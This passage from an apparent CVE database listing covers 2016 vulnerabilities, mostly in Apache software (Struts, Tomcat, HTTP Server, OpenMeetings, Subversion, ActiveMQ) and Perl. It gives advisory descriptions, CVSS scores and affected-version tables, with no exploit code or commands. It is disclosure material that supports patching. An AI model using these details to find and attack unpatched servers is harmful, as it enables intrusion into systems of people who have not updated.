oracle portal 11.1.1.6
apache struts 1.2.3
apache struts 1.0.2
apache struts 1.2.6
oracle banking_platform 2.3.0
apache struts 1.3.10
apache struts 1.2.8
apache struts 1.2.0
apache struts 1.2.1
apache struts 1.2.7
apache struts 1.2.5
apache struts 1.3.9
apache struts 1.2.9
apache struts 1.3.8
apache struts 1.2.2
oracle banking_platform 2.5.0
apache struts 1.1
apache struts 1.3.7
oracle banking_platform 2.4.0
apache struts 1.0
CVE-2016-1182 MEDIUM

ActionServlet.java in Apache Struts 1 1.x through 1.3.10 does not properly restrict the Validator configuration, which allows remote attackers to conduct cross-site scripting (XSS) attacks or cause a denial of service via crafted input, a related issue to CVE-2015-0899.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 1.2.4
apache struts 1.2.1
apache struts 1.2.7
apache struts 1.3.6
apache struts 1.3.5
apache struts 1.0.1
apache struts 1.2.5
apache struts 1.2.3
apache struts 1.3.9
apache struts 1.0.2
apache struts 1.2.9
apache struts 1.3.8
apache struts 1.2.2
apache struts 1.2.6
apache struts 1.3.10
apache struts 1.2.8
apache struts 1.2.0
apache struts 1.1
apache struts 1.3.7
apache struts 1.0
CVE-2016-1238 HIGH

(1) cpan/Archive-Tar/bin/ptar, (2) cpan/Archive-Tar/bin/ptardiff, (3) cpan/Archive-Tar/bin/ptargrep, (4) cpan/CPAN/scripts/cpan, (5) cpan/Digest-SHA/shasum, (6) cpan/Encode/bin/enc2xs, (7) cpan/Encode/bin/encguess, (8) cpan/Encode/bin/piconv, (9) cpan/Encode/bin/ucmlint, (10) cpan/Encode/bin/unidump, (11) cpan/ExtUtils-MakeMaker/bin/instmodsh, (12) cpan/IO-Compress/bin/zipdetails, (13) cpan/JSON-PP/bin/json_pp, (14) cpan/Test-Harness/bin/prove, (15) dist/ExtUtils-ParseXS/lib/ExtUtils/xsubpp, (16) dist/Module-CoreList/corelist, (17) ext/Pod-Html/bin/pod2html, (18) utils/c2ph.PL, (19) utils/h2ph.PL, (20) utils/h2xs.PL, (21) utils/libnetcfg.PL, (22) utils/perlbug.PL, (23) utils/perldoc.PL, (24) utils/perlivp.PL, and (25) utils/splain.PL in Perl 5.x before 5.22.3-RC2 and 5.24 before 5.24.1-RC2 do not properly remove . (period) characters from the end of the includes directory array, which might allow local users to gain privileges via a Trojan horse module under the current working directory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
perl perl 5.16.1
perl perl 5.21.10
perl perl 5.17.2
perl perl 5.17.1
perl perl 5.003_90
perl perl 5.8.8
perl perl 5.003_28
perl perl 5.10.1
perl perl 5.18.0
perl perl 5.19.1
perl perl 5.24.0
perl perl 5.003_05
perl perl 5.003_03
perl perl 5.13.2
perl perl 5.19.5
perl perl 5.003_11
perl perl 5.003_15
perl perl 5.003_13
perl perl 5.005
perl perl 5.003_26
perl perl 5.003_25
perl perl 5.17.9
perl perl 5.21.5
perl perl 5.8.6
perl perl 5.10
perl perl 5.004_01
perl perl 5.003_20
perl perl 5.6.1
perl perl 5.005_01
perl perl 5.003_97e
perl perl 5.003_18
perl perl 5.15.5
perl perl 5.11.2
perl perl 5.15.6
perl perl 5.19.0
perl perl 5.19.6
perl perl 5.003_97d
perl perl 5.8.4
perl perl 5.003_08
perl perl 5.18.4
perl perl 5.11.5
perl perl 5.21.6
perl perl 5.19.2
perl perl 5.19.7
perl perl 5.21.1
perl perl 5.003_12
perl perl 5.18.3
perl perl 5.003_99
perl perl 5.13.8
perl perl 5.8.0
perl perl 5.22.2
perl perl 5.9.5
perl perl 5.12.4
perl perl 5.003_98
perl perl 5.003_09
perl perl 5.17.3
perl perl 5.19.8
perl perl 5.17.5
perl perl 5.21.8
perl perl 5.15.1
perl perl 5.17.7.0
perl perl 5.8.9
perl perl 5.18.2
perl perl 5.003_99a
perl perl 5.19.11
perl perl 5.21.4
debian debian_linux 8.0
perl perl 5.001
perl perl 5.003_97
perl perl 5.005_03
perl perl 5.004
perl perl 5.13.3
perl perl 5.003_22
perl perl 5.6.0
perl perl 5.9.0
perl perl 5.15.8
perl perl 5.15.4
perl perl 1.0.15
perl perl 5.16.0
perl perl 5.13.0
perl perl 5.8.1
perl perl 5.20.3
perl perl 5.9.1
perl perl 5.003_91
perl perl 5.20.0
perl perl 5.003_04
perl perl 5.21.7
perl perl 5.8.7
perl perl 5.003_97f
perl perl 5.14.2
perl perl 5.003_97a
perl perl 5.003_97h
perl perl 5.003_14
perl perl 5.003_10
perl perl 5.22.0
perl perl 5.13.9
perl perl 5.17.7
perl perl 5.8.2
perl perl 5.003_97b
perl perl 5.10.0
perl perl 5.003_96
perl perl 5.19.9
perl perl 5.13.7
perl perl 5.004_05
perl perl 5.7.3
perl perl 5.004_03
apache spamassassin *
perl perl 5.13.10
perl perl 5.14.3
perl perl 5.17.8
perl perl 5.11.1
perl perl 5.19.3
perl perl 5.9.3
perl perl 5.24.1
perl perl 5.16.3
perl perl 5.003_23
perl perl 5.000
perl perl 1.0.16
perl perl 5.8
perl perl 5.8.3
perl perl 5.002
perl perl 5.19.10
perl perl 5.003
perl perl 5.003_24
perl perl 5.003_97g
perl perl 5.15.0
perl perl 5.12.5
perl perl 5.15.3
perl perl 5.20.1
perl perl 5.21.2
perl perl 5.9.4
perl perl 5.6
opensuse leap 15.0
perl perl 5.11.0
perl perl 5.003_95
perl perl 5.15.9
perl perl 5.9.2
perl perl 5.003_93
perl perl 5.14.1
perl perl 5.003_02
perl perl 5.22.1
perl perl 5.13.5
perl perl 5.13.6
perl perl 5.001n
perl perl 5.003_16
perl perl 5.13.11
perl perl 5.17.6
perl perl 5.003_97i
perl perl 5.20.2
perl perl 5.21.11
perl perl 5.12.2
perl perl 5.13.4
perl perl 5.005_02
perl perl 5.11.3
perl perl 5.16.2
perl perl 5.17.4
perl perl 5.11.4
perl perl 5.003_94
perl perl 5.14.0
perl perl 5.19.4
perl perl 5.21.9
perl perl 5.8.5
perl perl 5.12.0
fedoraproject fedora 23
perl perl 5.003_92
perl perl 5.003_01
perl perl 5.004_04
perl perl 5.003_21
perl perl 5.003_27
perl perl 5.17.0
perl perl 5.003_19
perl perl 5.22.3
perl perl 5.21.3
perl perl 5.005_04
fedoraproject fedora 24
perl perl 5.004_02
perl perl 5.17.11
perl perl 5.14.4
perl perl 5.15.7
perl perl 5.12.3
perl perl 5.003_97c
perl perl 5.6.2
perl perl 5.12.1
perl perl 5.13.1
perl perl 5.000o
perl perl 5.18.1
perl perl 5.003_17
perl perl 5.002_01
perl perl 5.003_07
perl perl 5.21.0
perl perl 5.003_97j
perl perl 5.17.10
perl perl 5.15.2
CVE-2016-1240 HIGH

The Tomcat init script in the tomcat7 package before 7.0.56-3+deb8u4 and tomcat8 package before 8.0.14-1+deb8u3 on Debian jessie and the tomcat6 and libtomcat6-java packages before 6.0.35-1ubuntu3.8 on Ubuntu 12.04 LTS, the tomcat7 and libtomcat7-java packages before 7.0.52-1ubuntu0.7 on Ubuntu 14.04 LTS, and tomcat8 and libtomcat8-java packages before 8.0.32-1ubuntu1.2 on Ubuntu 16.04 LTS allows local users with access to the tomcat account to gain root privileges via a symlink attack on the Catalina log file, as demonstrated by /var/log/tomcat7/catalina.out.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 8.0
apache tomcat 7.0
apache tomcat 6.0
CVE-2016-15057

** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Continuum. This issue affects Apache Continuum: all versions. Attackers with access to the installation's REST API can use this to invoke arbitrary commands on the server. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.9 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 3.1 6.0

Products Affected

Vendor Product Version
apache continuum *
CVE-2016-1513 MEDIUM

The Impress tool in Apache OpenOffice 4.1.2 and earlier allows remote attackers to cause a denial of service (out-of-bounds read or write) or execute arbitrary code via crafted MetaActions in an (1) ODP or (2) OTP file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-125,CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2016-1546 MEDIUM

The Apache HTTP Server 2.4.17 and 2.4.18, when mod_http2 is enabled, does not limit the number of simultaneous stream workers for a single HTTP/2 connection, which allows remote attackers to cause a denial of service (stream-processing outage) via modified flow-control windows.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache http_server 2.4.17
apache http_server 2.4.18
CVE-2016-1566 LOW

Cross-site scripting (XSS) vulnerability in the file browser in Guacamole 0.9.8 and 0.9.9, when file transfer is enabled to a location shared by multiple users, allows remote authenticated users to inject arbitrary web script or HTML via a crafted filename. NOTE: this vulnerability was fixed in guacamole.war on 2016-01-13, but the version number was not changed.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache guacamole 0.9.8
apache guacamole 0.9.9
CVE-2016-2099 HIGH

Use-after-free vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 3.1.3 and earlier allows context-dependent attackers to have unspecified impact via an invalid character in an XML document.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
opensuse opensuse 13.2
apache xerces-c++ *
CVE-2016-2161 MEDIUM

In Apache HTTP Server versions 2.4.0 to 2.4.23, malicious input to mod_auth_digest can cause the server to crash, and each instance continues to crash even for subsequently valid requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-823,CWE-20,

Products Affected

Vendor Product Version
apache http_server 2.4.7
apache http_server 2.4.0
apache http_server 2.4.19
apache http_server 2.4.23
apache http_server 2.4.2
apache http_server 2.4.6
apache http_server 2.4.20
apache http_server 2.4.12
apache http_server 2.4.22
apache http_server 2.4.3
apache http_server 2.4.16
apache http_server 2.4.10
apache http_server 2.4.1
apache http_server 2.4.8
apache http_server 2.4.9
apache http_server 2.4.21
apache http_server 2.4.14
CVE-2016-2162 MEDIUM

Apache Struts 2.x before 2.3.25 does not sanitize text in the Locale object constructed by I18NInterceptor, which might allow remote attackers to conduct cross-site scripting (XSS) attacks via unspecified vectors involving language display.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.20
apache struts 2.0.9
apache struts 2.3.14.1
apache struts 2.3.16.2
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.1.2_beta
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.24
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.1.2
apache struts 2.3.24.1
apache struts 2.2.3
apache struts 2.3.16
CVE-2016-2163 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache OpenMeetings before 3.1.1 allows remote attackers to inject arbitrary web script or HTML via the event description when creating an event.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2016-2164 MEDIUM

The (1) FileService.importFileByInternalUserId and (2) FileService.importFile SOAP API methods in Apache OpenMeetings before 3.1.1 improperly use the Java URL class without checking the specified protocol handler, which allows remote attackers to read arbitrary files by attempting to upload a file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2016-2166 MEDIUM

The (1) proton.reactor.Connector, (2) proton.reactor.Container, and (3) proton.utils.BlockingConnection classes in Apache Qpid Proton before 0.12.1 improperly use an unencrypted connection for an amqps URI scheme when SSL support is unavailable, which might allow man-in-the-middle attackers to obtain sensitive information or modify data via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
fedoraproject fedora 23
apache qpid_proton *
CVE-2016-2167 MEDIUM

The canonicalize_username function in svnserve/cyrus_auth.c in Apache Subversion before 1.8.16 and 1.9.x before 1.9.4, when Cyrus SASL authentication is used, allows remote attackers to authenticate and bypass intended access restrictions via a realm string that is a prefix of an expected repository realm string.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache subversion 1.9.1
apache subversion 1.9.2
apache subversion 1.9.0
apache subversion *
apache subversion 1.9.3
CVE-2016-2168 MEDIUM

The req_check_access function in the mod_authz_svn module in the httpd server in Apache Subversion before 1.8.16 and 1.9.x before 1.9.4 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a crafted header in a (1) MOVE or (2) COPY request, involving an authorization check.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache subversion 1.9.1
apache subversion 1.9.2
apache subversion 1.9.0
apache subversion *
apache subversion 1.9.3
CVE-2016-2170 HIGH

Apache OFBiz 12.04.x before 12.04.06 and 13.07.x before 13.07.03 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections library.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2016-2171 MEDIUM

The User Manager service in Apache Jetspeed before 2.3.1 does not properly restrict access using Jetspeed Security, which allows remote attackers to (1) add, (2) edit, or (3) delete users via the REST API.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache jetspeed *
CVE-2016-2174 MEDIUM

SQL injection vulnerability in the policy admin tool in Apache Ranger before 0.5.3 allows remote authenticated administrators to execute arbitrary SQL commands via the eventTime parameter to service/plugins/policies/eventTime.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache ranger 0.5.1
apache ranger 0.5.2
apache ranger 0.5.0
CVE-2016-2175 HIGH

Apache PDFBox before 1.8.12 and 2.x before 2.0.1 does not properly initialize the XML parsers, which allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted PDF.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache pdfbox 1.8.11
apache pdfbox 2.0
apache pdfbox 1.8.2
apache pdfbox 1.8.9
apache pdfbox 1.8.10
apache pdfbox 1.8.1
debian debian_linux 8.0
apache pdfbox 1.8.6
apache pdfbox 1.8.8
apache pdfbox 1.8.3
apache pdfbox 1.8.5
apache pdfbox 1.8.7
apache pdfbox 1.8.0
apache pdfbox 1.8.4
CVE-2016-3081 HIGH

Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.20
apache struts 2.0.9
apache struts 2.3.14.1
apache struts 2.3.16.2
oracle siebel_e-billing 7.1
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.1.2
apache struts 2.3.24.1
apache struts 2.2.3
apache struts 2.3.16
CVE-2016-3082 HIGH

XSLTResult in Apache Struts 2.x before 2.3.20.2, 2.3.24.x before 2.3.24.2, and 2.3.28.x before 2.3.28.1 allows remote attackers to execute arbitrary code via the stylesheet location parameter.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.20
apache struts 2.0.9
apache struts 2.3.14.1
apache struts 2.3.16.2
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.1.2
apache struts 2.3.24.1
apache struts 2.2.3
apache struts 2.3.16
CVE-2016-3083 MEDIUM

Apache Hive (JDBC + HiveServer2) implements SSL for plain TCP and HTTP connections (it supports both transport modes). While validating the server's certificate during connection setup, the client in Apache Hive before 1.2.2 and 2.0.x before 2.0.1 does not verify the common name attribute of the certificate. As a result, if a JDBC client opens an SSL connection to server abc.com and the server presents a valid CA-signed certificate that was issued to xyz.com, the client accepts it as a valid certificate and the SSL handshake completes.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache hive 1.1.0
apache hive 1.0.0
apache hive 1.0.1
apache hive 1.1.1
apache hive 0.13.0
apache hive 0.13.1
apache hive 0.14.0
apache hive 1.2.0
apache hive 1.2.1
CVE-2016-3085 MEDIUM

Apache CloudStack 4.5.x before 4.5.2.1, 4.6.x before 4.6.2.1, 4.7.x before 4.7.1.1, and 4.8.x before 4.8.0.1, when SAML-based authentication is enabled and used, allow remote attackers to bypass authentication and access the user interface via vectors related to the SAML plugin.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-254,CWE-287,

Products Affected

Vendor Product Version
apache cloudstack 4.7.0
apache cloudstack 4.6.0
apache cloudstack 4.6.2
apache cloudstack 4.8
apache cloudstack 4.5.2
apache cloudstack 4.6.1
apache cloudstack 4.5.1
CVE-2016-3086 MEDIUM

The YARN NodeManager in Apache Hadoop 2.6.x before 2.6.5 and 2.7.x before 2.7.3 can leak the password for credential store provider used by the NodeManager to YARN Applications.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache hadoop 2.6.2
apache hadoop 2.6.4
apache hadoop 2.7.1
apache hadoop 2.7.0
apache hadoop 2.6.0
apache hadoop 2.6.3
apache hadoop 2.7.2
apache hadoop 2.6.1
CVE-2016-3087 HIGH

Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via vectors related to an ! (exclamation mark) operator to the REST Plugin.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.28
apache struts 2.3.24.1
apache struts 2.3.20.1
apache struts 2.3.24
CVE-2016-3088 HIGH

The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-434,

Products Affected

Vendor Product Version
apache activemq *
CVE-2016-3089 MEDIUM

Cross-site scripting (XSS) vulnerability in the SWF panel in Apache OpenMeetings before 3.1.2 allows remote attackers to inject arbitrary web script or HTML via the swf parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2016-3090 MEDIUM

The TextParseUtil.translateVariables method in Apache Struts 2.x before 2.3.20 allows remote attackers to execute arbitrary code via a crafted OGNL expression with ANTLR tooling.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.0.9
apache struts 2.3.17
apache struts 2.3.14.1
apache struts 2.3.11
apache struts 2.3.16.2
apache struts 2.3.10
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.1.7
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.0.14
apache struts 2.3.15.1
apache struts 2.3.13
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.6
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.3.19
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.3.9
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.5
apache struts 2.3.1.2
apache struts 2.2.3
apache struts 2.3.16
CVE-2016-3092 HIGH

The MultipartStream class in Apache Commons Fileupload before 1.3.2, as used in Apache Tomcat 7.x before 7.0.70, 8.x before 8.0.36, 8.5.x before 8.5.3, and 9.x before 9.0.0.M7 and other products, allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.27
hp icewall_identity_manager 5.0
apache tomcat 8.0.0
apache tomcat 8.0.20
apache tomcat 7.0.39
apache tomcat 8.0.22
apache tomcat 7.0.56
apache tomcat 8.0.14
apache tomcat 7.0.68
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 8.5.2
apache tomcat 7.0.28
apache tomcat 8.0.35
apache tomcat 7.0.62
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 8.0.23
apache tomcat 7.0.40
apache tomcat 8.0.5
debian debian_linux 8.0
canonical ubuntu_linux 16.04
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 9.0.0
apache tomcat 7.0.11
apache tomcat 7.0.16
hp icewall_sso_agent_option 10.0
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 8.5.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.57
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 8.0.17
canonical ubuntu_linux 15.10
apache tomcat 7.0.35
apache tomcat 7.0.64
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
canonical ubuntu_linux 12.04
apache tomcat 7.0.61
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 7.0.29
canonical ubuntu_linux 14.04
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 8.0.26
apache tomcat 7.0.34
apache tomcat 7.0.20
apache tomcat 8.0.32
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 8.0.8
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.8
apache tomcat 7.0.55
apache tomcat 7.0.27
apache tomcat 7.0.69
apache tomcat 7.0.2
apache tomcat 8.0.28
apache commons_fileupload *
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 7.0.30
apache tomcat 8.0.18
CVE-2016-3093 MEDIUM

Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.20
ognl_project ognl *
apache struts 2.0.9
apache struts 2.3.14.1
apache struts 2.3.16.2
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.3.20.3
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.3.4.1
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.1.2
apache struts 2.3.24.1
apache struts 2.2.3
apache struts 2.3.16
CVE-2016-3094 MEDIUM

PlainSaslServer.java in Apache Qpid Java before 6.0.3, when the broker is configured to allow plaintext passwords, allows remote attackers to cause a denial of service (broker termination) via a crafted authentication attempt, which triggers an uncaught exception.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-287,

Products Affected

Vendor Product Version
apache qpid_broker-j *
CVE-2016-3427 HIGH

Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77; Java SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,CWE-284,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
redhat enterprise_linux_server_aus 7.4
opensuse leap 42.1
suse manager 2.1
apache cassandra *
redhat enterprise_linux_server_eus 6.7
suse linux_enterprise_server 10
netapp oncommand_performance_manager -
oracle jre 1.8.0
netapp vasa_provider_for_clustered_data_ontap *
suse linux_enterprise_server 12
redhat enterprise_linux_server 6.0
redhat enterprise_linux_eus 7.2
netapp e-series_santricity_management_plug-ins -
oracle jre 1.7.0
oracle linux 6
redhat enterprise_linux_desktop 5.0
netapp oncommand_unified_manager -
opensuse opensuse 13.2
redhat enterprise_linux_eus 7.3
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_desktop 6.0
apache cassandra 4.0.0
debian debian_linux 8.0
canonical ubuntu_linux 16.04
redhat enterprise_linux_eus 6.7
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_server_tus 7.2
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server 7.0
netapp virtual_storage_console *
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
netapp oncommand_balance -
